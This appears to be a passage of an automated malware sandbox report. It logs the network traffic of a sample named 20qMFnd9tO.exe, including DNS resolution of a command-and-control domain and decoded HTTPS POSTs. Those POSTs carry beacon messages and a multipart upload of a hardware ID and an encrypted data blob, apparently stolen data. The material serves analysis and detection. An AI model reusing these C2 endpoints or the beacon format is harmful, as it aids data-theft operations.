Mar 29, 2024 08:10:58.813636065 CET | 49737 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:58.813651085 CET | 443 | 49737 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:58.813749075 CET | 49737 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:58.813765049 CET | 443 | 49737 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:58.813880920 CET | 49737 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:58.813905001 CET | 443 | 49737 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:58.813910961 CET | 49737 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:58.814018011 CET | 49737 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:58.814044952 CET | 49737 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:58.860245943 CET | 443 | 49737 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:58.860383987 CET | 49737 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:58.860419989 CET | 49737 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:58.860426903 CET | 49737 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:58.908230066 CET | 443 | 49737 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:58.908406019 CET | 49737 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:58.908447981 CET | 49737 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:58.908474922 CET | 49737 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:58.956242085 CET | 443 | 49737 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:58.956456900 CET | 49737 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:10:59.000237942 CET | 443 | 49737 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:10:59.096817970 CET | 443 | 49737 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:11:00.614542961 CET | 443 | 49737 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:11:00.614666939 CET | 443 | 49737 | 172.67.221.128 | 192.168.2.4
Mar 29, 2024 08:11:00.614712954 CET | 49737 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:11:00.614809990 CET | 49737 | 443 | 192.168.2.4 | 172.67.221.128
Mar 29, 2024 08:11:00.614830971 CET | 443 | 49737 | 172.67.221.128 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 29, 2024 08:10:51.795130014 CET | 51851 | 53 | 192.168.2.4 | 1.1.1.1
Mar 29, 2024 08:10:51.903750896 CET | 53 | 51851 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 29, 2024 08:10:51.795130014 CET | 192.168.2.4 | 1.1.1.1 | 0x3514 | Standard query (0) | wagonglidemonkywo.shop | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 29, 2024 08:10:51.903750896 CET | 1.1.1.1 | 192.168.2.4 | 0x3514 | No error (0) | wagonglidemonkywo.shop | | 172.67.221.128 | A (IP address) | IN (0x0001) | false
Mar 29, 2024 08:10:51.903750896 CET | 1.1.1.1 | 192.168.2.4 | 0x3514 | No error (0) | wagonglidemonkywo.shop | | 104.21.38.98 | A (IP address) | IN (0x0001) | false
• wagonglidemonkywo.shop
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 172.67.221.128 | 443 | 7556 | C:\Users\user\Desktop\20qMFnd9tO.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-29 07:10:52 UTC | 269 | OUT | POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 8
  Host: wagonglidemonkywo.shop
2024-03-29 07:10:52 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
  Data Ascii: act=life
2024-03-29 07:10:52 UTC | 810 | IN | HTTP/1.1 200 OK
  Date: Fri, 29 Mar 2024 07:10:52 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: PHPSESSID=mn5evk7acbgbqgom517nqkk7vp; expires=Tue, 23-Jul-2024 00:57:31 GMT; Max-Age=9999999; path=/
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate
  Pragma: no-cache
  CF-Cache-Status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZLPO2ui9uz2CVBX64rDgn72uqEiX2akX7cM9U0peRqdJE3YQljFsjrtJTWAJhBE3F%2FPsafkx%2B%2BTcfRFAJfngEE74Udz%2B3KKIgCVOjlAPKpJER%2F2sUOoKuvh%2B0B6q2Tq8X6fQJVthM5US"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 86be0ae8cdd56fa1-IAD
  alt-svc: h3=":443"; ma=86400
2024-03-29 07:10:52 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
  Data Ascii: 2ok
2024-03-29 07:10:52 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49731 | 172.67.221.128 | 443 | 7556 | C:\Users\user\Desktop\20qMFnd9tO.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-29 07:10:52 UTC | 270 | OUT | POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 52
  Host: wagonglidemonkywo.shop
2024-03-29 07:10:52 UTC | 52 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 36 4d 6b 30 4d 2d 2d 6b 65 79 26 6a 3d 64 65 66 61 75 6c 74
  Data Ascii: act=recive_message&ver=4.0&lid=P6Mk0M--key&j=default
2024-03-29 07:10:53 UTC | 810 | IN | HTTP/1.1 200 OK
  Date: Fri, 29 Mar 2024 07:10:53 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: PHPSESSID=5qs5gocfj0culcivafg0eoq4js; expires=Tue, 23-Jul-2024 00:57:32 GMT; Max-Age=9999999; path=/
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate
  Pragma: no-cache
  CF-Cache-Status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9vKQQaE%2Be2%2Bad3ek42gbbjbwrubhTZov7UvM2zB7XIBGWn5YLRimpg3hOW%2F%2FgH9HEKZkaoT22%2Bd7CzG6f8rVWR1X4%2Bj1lObzQj1HsDjDPzKFjAQbQn5wrcA64LkYzaJarxuBdWnhboc1"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 86be0aed6814393e-IAD
  alt-svc: h3=":443"; ma=86400
2024-03-29 07:10:53 UTC | 559 | IN | Data Raw: 34 63 31 38 0d 0a 47 39 4b 6f 73 2f 65 4e 42 43 4a 35 52 49 4e 76 6e 52 54 6d 63 30 45 66 6f 79 32 7a 4f 52 65 6e 6d 7a 63 68 4e 30 67 54 43 73 56 67 33 36 4b 54 31 36 30 6b 41 41 39 6d 75 55 2b 70 4f 4f 74 35 59 54 2b 44 44 5a 46 4b 63 6f 57 68 46 31 56 46 50 58 59 6d 79 42 48 79 69 4a 50 58 72 32 56 47 57 33 36 6a 43 66 78 34 6c 52 5a 74 45 71 6b 4e 6b 78 6b 33 68 66 35 50 41 77 31 6f 53 41 66 50 4f 2f 4b 49 6b 39 65 74 66 79 39 7a 5a 4b 4e 50 76 54 54 47 55 32 45 39 78 6b 4f 52 41 7a 65 46 2f 6c 31 44 56 69 52 78 61 36 35 30 6f 73 54 51 6e 2b 46 6a 53 68 77 6e 35 77 37 78 65 59 4d 57 4a 48 37 4a 51 39 70 55 66 38 71 35 47 79 77 39 61 44 4d 71 35 54 76 79 69 4a 50 56 36 48 34 41 51 32 53 68 49 76 68 67 68 7a 34 67 62 4d 67 50 76 6a 4d 33 68 37 73 58 41
  Data Ascii: 4c18G9Kos/eNBCJ5RINvnRTmc0Efoy2zORenmzchN0gTCsVg36KT160kAA9muU+pOOt5YT+DDZFKcoWhF1VFPXYmyBHyiJPXr2VGW36jCfx4lRZtEqkNkxk3hf5PAw1oSAfPO/KIk9etfy9zZKNPvTTGU2E9xkORAzeF/l1DViRxa650osTQn+FjShwn5w7xeYMWJH7JQ9pUf8q5Gyw9aDMq5TvyiJPV6H4AQ2ShIvhghz4gbMgPvjM3h7sXA
2024-03-29 07:10:53 UTC | 1369 | IN | Data Raw: 36 68 36 75 4d 48 44 6c 66 31 67 54 52 34 30 35 77 6a 78 66 49 63 44 4b 58 50 48 54 4e 68 51 66 4d 44 2b 55 51 4d 62 52 52 6b 71 35 54 76 79 69 4a 50 58 72 53 5a 48 41 32 61 35 54 37 39 58 69 52 6f 76 64 39 5a 50 6b 54 51 64 68 37 73 58 41 52 64 6f 62 69 62 49 45 66 4b 49 6b 39 65 74 4a 46 6c 30 54 71 4e 50 76 54 54 47 55 32 45 2f 67 55 6a 64 47 79 32 48 75 56 46 43 55 53 74 31 5a 71 6c 39 76 4d 7a 66 6d 4f 42 67 53 68 73 68 36 77 58 33 64 34 6b 61 4c 48 33 45 51 74 56 64 65 63 54 38 46 51 30 36 51 6a 4d 71 35 54 76 79 69 4a 50 58 72 32 46 59 57 33 36 6a 54 64 46 78 68 77 4e 68 53 4d 4a 42 33 31 78 6a 68 5a 59 39 41 52 64 6f 4d 79 72 6c 5a 76 36 6c 75 64 65 74 4a 41 4a 5a 5a 50 68 69 6c 7a 54 47 55 32 45 2f 67 77 32 54 47 33 4c 4a 75 51 30 42 46 53 52 30
  Data Ascii: 6h6uMHDlf1gTR405wjxfIcDKXPHTNhQfMD+UQMbRRkq5TvyiJPXrSZHA2a5T79XiRovd9ZPkTQdh7sXARdobibIEfKIk9etJFl0TqNPvTTGU2E/gUjdGy2HuVFCUSt1Zql9vMzfmOBgShsh6wX3d4kaLH3EQtVdecT8FQ06QjMq5TvyiJPXr2FYW36jTdFxhwNhSMJB31xjhZY9ARdoMyrlZv6ludetJAJZZPhilzTGU2E/gw2TG3LJuQ0BFSR0
2024-03-29 07:10:53 UTC | 1369 | IN | Data Raw: 79 4b 6e 2f 71 48 4a 41 4a 5a 5a 4b 4e 50 76 54 54 45 46 6a 73 39 6d 51 32 52 63 58 62 52 2b 6c 38 42 59 43 6c 2f 5a 71 42 76 38 4b 57 35 31 36 30 6b 41 6c 6c 6b 2f 6b 4f 51 48 73 5a 54 59 54 2b 44 44 63 67 30 48 59 65 37 46 77 45 58 61 44 4d 71 35 33 36 38 69 6f 6e 58 72 32 74 42 45 79 44 7a 41 76 4a 31 69 68 38 73 65 4d 35 48 30 56 74 34 77 50 31 65 53 46 59 6e 64 58 71 74 65 62 6a 50 30 4a 2f 6c 4a 67 35 30 54 71 4e 50 76 54 54 47 55 32 45 2f 67 55 6a 4a 47 79 32 48 75 57 52 55 58 6d 68 45 61 36 6c 33 74 39 79 52 2b 6f 63 6b 41 6c 6c 6b 6f 30 2f 67 4f 4f 74 35 59 54 2b 44 44 5a 4d 5a 62 4b 71 52 46 77 45 58 61 44 4d 71 35 54 76 77 7a 64 33 56 74 79 51 41 46 69 37 6b 43 50 42 33 6a 68 38 6d 64 38 31 48 33 31 68 6e 79 76 31 56 54 31 30 67 66 47 61 6a 63
  Data Ascii: yKn/qHJAJZZKNPvTTEFjs9mQ2RcXbR+l8BYCl/ZqBv8KW5160kAllk/kOQHsZTYT+DDcg0HYe7FwEXaDMq5368ionXr2tBEyDzAvJ1ih8seM5H0Vt4wP1eSFYndXqtebjP0J/lJg50TqNPvTTGU2E/gUjJGy2HuWRUXmhEa6l3t9yR+ockAllko0/gOOt5YT+DDZMZbKqRFwEXaDMq5Tvwzd3VtyQAFi7kCPB3jh8md81H31hnyv1VT10gfGajc
2024-03-29 07:10:53 UTC | 1369 | IN | Data Raw: 36 68 79 51 43 57 57 53 6a 54 37 30 30 78 42 59 76 50 5a 6b 4e 6b 56 68 78 78 66 68 56 53 30 63 71 59 32 79 6b 66 37 37 44 33 70 2f 67 5a 30 34 52 4c 2b 59 4b 38 6e 43 4c 45 69 78 38 78 55 48 51 47 7a 75 71 6b 52 63 42 46 32 67 7a 4b 75 55 37 38 4d 33 4a 31 62 63 6b 41 44 51 6c 39 77 65 2f 47 65 78 54 59 54 2b 44 44 5a 4e 45 4f 36 71 52 46 77 45 58 61 44 4d 71 76 68 62 59 69 4a 50 58 72 53 51 43 57 57 53 68 43 76 4d 32 33 46 4e 6a 64 38 31 4c 30 6c 64 38 79 66 52 55 52 31 49 6e 64 57 69 68 66 37 58 4c 32 70 33 6a 61 55 6f 58 49 75 30 45 2b 58 71 48 45 69 55 39 6a 79 43 35 47 54 65 48 75 78 63 42 46 32 67 78 62 37 38 35 36 49 69 52 74 4f 4a 74 54 42 73 6c 38 41 71 2f 47 65 78 54 59 54 2b 44 44 5a 4e 45 4f 36 71 52 46 77 45 58 61 44 4d 71 76 68 62 59 69 4a
  Data Ascii: 6hyQCWWSjT700xBYvPZkNkVhxxfhVS0cqY2ykf77D3p/gZ04RL+YK8nCLEix8xUHQGzuqkRcBF2gzKuU78M3J1bckADQl9we/GexTYT+DDZNEO6qRFwEXaDMqvhbYiJPXrSQCWWShCvM23FNjd81L0ld8yfRUR1IndWihf7XL2p3jaUoXIu0E+XqHEiU9jyC5GTeHuxcBF2gxb7856IiRtOJtTBsl8Aq/GexTYT+DDZNEO6qRFwEXaDMqvhbYiJ
2024-03-29 07:10:53 UTC | 1369 | IN | Data Raw: 4c 33 4e 6b 6f 30 2b 39 4e 4d 59 49 54 42 57 44 44 5a 4d 5a 4e 34 65 37 46 77 4e 53 4a 6a 45 77 35 54 6d 38 77 39 65 54 36 6d 70 42 48 53 37 6b 42 66 74 33 67 68 63 67 63 73 56 4b 30 46 52 78 79 66 64 66 51 6c 51 6d 65 6d 65 73 66 50 43 45 76 76 32 74 4a 41 4a 5a 5a 4b 4e 50 76 54 61 44 43 57 4d 6c 67 77 2f 67 57 47 50 53 36 56 6b 44 4f 6b 49 7a 4b 75 55 37 38 6f 6a 4f 32 34 41 4f 41 6c 6c 6b 6f 30 2b 39 62 2b 74 35 59 54 2b 44 44 5a 4d 5a 4e 34 65 35 55 6b 38 56 63 6a 4d 6f 70 6d 75 36 77 4e 2b 51 34 47 4e 44 46 43 48 73 43 2f 4e 38 6a 52 6b 6c 63 73 68 64 30 6c 64 37 77 76 64 5a 54 56 67 67 63 6d 58 6e 4e 39 2b 69 6b 39 65 74 4a 41 4a 5a 5a 4b 4e 4e 2b 47 37 45 53 57 45 39 37 55 6a 63 64 58 37 4a 2f 68 55 73 50 57 67 7a 4b 75 55 37 38 74 57 66 2b 6f 63
  Data Ascii: L3Nko0+9NMYITBWDDZMZN4e7FwNSJjEw5Tm8w9eT6mpBHS7kBft3ghcgcsVK0FRxyfdfQlQmemesfPCEvv2tJAJZZKNPvTaDCWMlgw/gWGPS6VkDOkIzKuU78ojO24AOAllko0+9b+t5YT+DDZMZN4e5Uk8VcjMopmu6wN+Q4GNDFCHsC/N8jRklcshd0ld7wvdZTVggcmXnN9+ik9etJAJZZKNN+G7ESWE97UjcdX7J/hUsPWgzKuU78tWf+oc
2024-03-29 07:10:53 UTC | 1369 | IN | Data Raw: 59 6c 50 76 54 54 47 55 32 45 2f 67 77 2f 57 56 7a 57 64 75 78 56 48 58 79 70 38 59 71 78 32 73 38 33 66 6c 65 4a 73 55 68 4d 6d 34 51 50 35 64 34 67 55 49 6e 48 43 58 64 31 64 65 4d 50 78 52 77 4d 62 52 52 6b 71 35 54 76 79 69 4a 50 58 72 53 5a 48 41 32 61 35 54 37 39 57 6a 78 30 67 63 63 42 49 35 46 68 37 79 2f 35 44 41 7a 70 43 4d 79 72 6c 4f 2f 4b 49 7a 74 75 45 43 53 68 77 5a 4b 4d 55 6b 42 37 47 55 32 45 2f 67 77 32 54 47 54 58 43 39 52 55 62 46 32 70 38 5a 4b 31 30 74 63 37 5a 6b 75 78 6e 54 42 38 72 37 41 6e 32 63 6f 45 44 4d 58 76 50 54 39 35 56 65 73 6e 72 57 30 5a 56 4a 6a 45 6d 79 42 48 79 69 4a 50 58 72 53 51 43 57 57 62 6d 46 62 38 75 78 6c 45 53 61 73 45 50 76 6a 4d 33 68 37 73 58 41 52 63 31 50 77 50 49 45 64 2b 69 75 74 65 74 66 79 39 7a
                                            Data Ascii: YlPvTTGU2E/gw/WVzWduxVHXyp8Yqx2s83fleJsUhMm4QP5d4gUInHCXd1deMPxRwMbRRkq5TvyiJPXrSZHA2a5T79Wjx0gccBI5Fh7y/5DAzpCMyrlO/KIztuECShwZKMUkB7GU2E/gw2TGTXC9RUbF2p8ZK10tc7ZkuxnTB8r7An2coEDMXvPT95VesnrW0ZVJjEmyBHyiJPXrSQCWWbmFb8uxlESasEPvjM3h7sXARc1PwPIEd+iutetfy9z
                                            2024-03-29 07:10:53 UTC1369INData Raw: 38 75 78 6c 45 41 61 74 46 43 6b 54 51 64 68 37 73 58 41 52 64 6f 62 69 62 49 45 66 4b 49 6b 39 65 74 4a 46 6c 30 54 71 4e 50 76 54 54 47 55 32 45 2f 67 55 6a 64 47 79 32 48 75 56 31 4f 58 53 42 31 62 36 70 2b 74 73 50 44 6e 4f 70 6f 51 42 38 74 37 67 76 37 64 59 51 44 4a 58 6e 4a 54 4e 78 57 65 38 62 39 46 51 30 36 51 6a 4d 71 35 54 76 79 69 4a 50 58 72 32 46 59 57 33 36 6a 54 63 31 37 69 67 6f 73 65 74 42 46 6b 54 51 64 68 37 73 58 41 52 64 6f 62 69 62 49 45 66 4b 49 6b 39 65 74 4a 46 6c 30 54 71 4e 50 76 54 54 47 55 32 45 2f 67 55 6a 64 47 79 32 48 75 56 46 4e 52 79 46 77 59 36 78 33 74 38 58 55 6e 2b 39 70 52 42 67 6f 36 67 7a 38 66 6f 6b 63 4c 58 66 49 52 74 5a 58 63 63 4b 35 47 79 77 39 61 44 4d 71 35 54 76 79 69 4a 50 56 36 48 34 41 51 32 53 68 4a
                                            Data Ascii: 8uxlEAatFCkTQdh7sXARdobibIEfKIk9etJFl0TqNPvTTGU2E/gUjdGy2HuV1OXSB1b6p+tsPDnOpoQB8t7gv7dYQDJXnJTNxWe8b9FQ06QjMq5TvyiJPXr2FYW36jTc17igosetBFkTQdh7sXARdobibIEfKIk9etJFl0TqNPvTTGU2E/gUjdGy2HuVFNRyFwY6x3t8XUn+9pRBgo6gz8fokcLXfIRtZXccK5Gyw9aDMq5TvyiJPV6H4AQ2ShJ
                                            2024-03-29 07:10:53 UTC1369INData Raw: 62 4c 58 54 54 44 35 38 30 48 59 65 37 46 77 45 58 61 44 4d 71 35 33 36 6f 69 6f 6e 58 72 30 78 62 47 69 76 74 54 39 46 39 6b 68 5a 68 58 4d 39 45 31 6c 64 6a 68 5a 59 39 41 52 64 6f 4d 79 72 6c 5a 76 36 6c 75 64 65 74 4a 41 4a 5a 5a 50 68 69 6c 7a 54 47 55 32 45 2f 67 77 32 54 47 33 4c 4a 75 51 30 42 46 53 4e 2f 5a 4b 52 2b 75 4d 4c 55 6c 65 52 6d 54 78 45 6f 35 68 2f 31 65 6f 34 44 4c 48 37 4d 53 39 78 52 63 4d 7a 72 55 45 70 54 61 6a 38 48 7a 7a 76 79 69 4a 50 58 72 53 51 43 57 79 48 35 54 61 63 30 78 43 6b 6f 63 2f 4e 4d 79 68 73 61 72 62 73 58 41 52 64 6f 4d 33 66 70 46 74 69 49 6b 39 65 74 4a 41 49 43 53 59 6c 50 76 54 54 47 55 32 45 2f 67 77 2f 57 56 7a 57 64 75 78 56 41 55 69 6c 77 59 71 35 31 76 38 33 56 68 2b 56 68 55 68 6f 6e 36 67 44 7a 64 6f
                                            Data Ascii: bLXTTD580HYe7FwEXaDMq536oionXr0xbGivtT9F9khZhXM9E1ldjhZY9ARdoMyrlZv6ludetJAJZZPhilzTGU2E/gw2TG3LJuQ0BFSN/ZKR+uMLUleRmTxEo5h/1eo4DLH7MS9xRcMzrUEpTaj8HzzvyiJPXrSQCWyH5Tac0xCkoc/NMyhsarbsXARdoM3fpFtiIk9etJAICSYlPvTTGU2E/gw/WVzWduxVAUilwYq51v83Vh+VhUhon6gDzdo
                                            2024-03-29 07:10:53 UTC1369INData Raw: 67 57 7a 47 54 58 2f 65 75 54 6f 72 46 32 67 7a 4b 75 55 37 72 34 53 2b 2f 61 30 6b 41 6c 6c 6b 6f 78 53 51 48 73 5a 54 59 54 2b 44 44 5a 4d 5a 4e 63 4c 31 46 52 73 58 61 6e 78 76 71 58 47 32 78 4e 65 48 34 32 6c 47 47 79 66 72 41 50 4e 39 67 78 38 6f 65 38 52 43 30 56 31 7a 77 66 31 52 54 56 5a 71 50 77 66 50 4f 2f 4b 49 6b 39 65 74 4a 41 4a 62 49 66 6c 4e 70 7a 54 45 4e 67 35 4d 67 32 7a 47 54 58 2f 43 39 55 4e 49 56 43 6c 6e 5a 62 63 35 33 36 4b 54 31 36 30 6b 41 6c 6b 35 72 32 4b 58 4e 4d 5a 54 59 54 2b 44 56 72 34 7a 4e 34 65 37 46 77 45 58 61 44 4d 6f 6f 48 58 77 6b 70 50 56 35 47 68 46 47 69 72 72 43 76 46 6b 68 52 73 76 66 4d 5a 49 32 6b 6c 2b 31 2f 4a 64 51 46 73 69 65 47 69 70 65 62 48 48 30 64 57 68 43 53 68 5a 5a 4b 4e 50 76 54 54 47 55 32 4e
                                            Data Ascii: gWzGTX/euTorF2gzKuU7r4S+/a0kAllkoxSQHsZTYT+DDZMZNcL1FRsXanxvqXG2xNeH42lGGyfrAPN9gx8oe8RC0V1zwf1RTVZqPwfPO/KIk9etJAJbIflNpzTENg5Mg2zGTX/C9UNIVClnZbc536KT160kAlk5r2KXNMZTYT+DVr4zN4e7FwEXaDMooHXwkpPV5GhFGirrCvFkhRsvfMZI2kl+1/JdQFsieGipebHH0dWhCShZZKNPvTTGU2N


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            2 | 192.168.2.4 | 49732 | 172.67.221.128 | 443 | 7556 | C:\Users\user\Desktop\20qMFnd9tO.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2024-03-29 07:10:53 UTC | 288 | OUT | POST /api HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                            Content-Length: 18161
                                            Host: wagonglidemonkywo.shop
                                            2024-03-29 07:10:53 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 37 30 46 33 41 45 33 30 41 34 35 37 31 34 32 31 30 33 38 43 30 44 44 36 33 45 38 37 44 41 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 6b 65 79 0d 0a
                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"070F3AE30A4571421038C0DD63E87DA4--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--key
                                            2024-03-29 07:10:53 UTC2830OUTData Raw: 12 32 f5 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33 f8 52 f0 fd e9 0a 3f
                                            Data Ascii: 2MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X|mn^IUm'3R?
                                            2024-03-29 07:10:54 UTC | 806 | IN | HTTP/1.1 200 OK
                                            Date: Fri, 29 Mar 2024 07:10:54 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Set-Cookie: PHPSESSID=ggqjrr4qfc5iksk5b0fctlpj99; expires=Tue, 23-Jul-2024 00:57:33 GMT; Max-Age=9999999; path=/
                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                            Cache-Control: no-store, no-cache, must-revalidate
                                            Pragma: no-cache
                                            CF-Cache-Status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KP8cm8v%2BOaSyPOEJmVgujLGVkShmnJQUj2U7TyomkIvroynQ%2FB4qvMvbtzKJ0dcA7mSn74nzFHiynfpqoVgPhYNugexrI8UGljknW1unjNxg%2FAiVJo0nF0LuCZXkv5nJ520%2BYnBm4aM6"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 86be0af1da452006-IAD
                                            alt-svc: h3=":443"; ma=86400
                                            2024-03-29 07:10:54 UTC | 22 | IN | Data Raw: 31 30 0d 0a 6f 6b 20 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 0d 0a
                                            Data Ascii: 10ok 102.165.48.43
                                            2024-03-29 07:10:54 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            3 | 192.168.2.4 | 49733 | 172.67.221.128 | 443 | 7556 | C:\Users\user\Desktop\20qMFnd9tO.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2024-03-29 07:10:54 UTC | 287 | OUT | POST /api HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                            Content-Length: 8782
                                            Host: wagonglidemonkywo.shop
